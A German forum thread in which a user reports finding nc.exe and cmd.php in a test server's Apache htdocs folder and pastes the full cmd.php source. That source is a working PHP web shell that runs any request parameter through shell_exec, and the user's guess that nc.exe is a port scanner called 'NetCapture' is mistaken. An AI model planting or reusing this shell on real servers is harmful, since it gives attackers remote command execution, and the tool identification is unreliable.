nc.exe und cmd.php

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • nc.exe und cmd.php

    Hallo zusammen,
    ich hoffe ich bin hier in der richtigen Section.

    Ich habe gerade auf unserer Testumgebung im Verzeichnis Apache2/htdocs/ zwei mekwürdige Dateien entdeckt:

    nc.exe (58kb groß) und eine cmd.php

    Ich vermute mal das es sich bei dieser nc.exe um NetCapture handelt und das ist soweit ich weiß ein Portscanner. Löschen lässt sich die Datei nicht!

    Kann mir jemand sagen wie ich dieses Ding wieder loswerde?

    MFG
    Ouzo

  • #2
    woher hast du den apache (nen komplettpacket) oder selbst eingerichtet ...

    was steht denn in der cmd.php drinne ???

    Kommentar


    • #3
      PHP-Code:
      <? $cmd = $_REQUEST["-cmd"];?>
      <html>
      <head>
      <title>cmd.php</title>
      </head>
      <body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()">
      <form method=POST>
      <br>
      <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;">
      <hr>
      <pre>
      <? if($cmd != "") print Shell_Exec($cmd);?>
      </pre>
      </form>
      </body>
      </html>
      Soweit ich weiß war das kein Komplettpaket. Das ganze steht aber auch schon ne ganze Weile. Ich weiß nur das vor kurzem von PHP 4 auf PHP 5 umgestigen wurde. Dabei wurde dann auch auf apachefriends/xampp verzichtet.

      So Long
      Ouzo

      Kommentar

      Lädt...
      X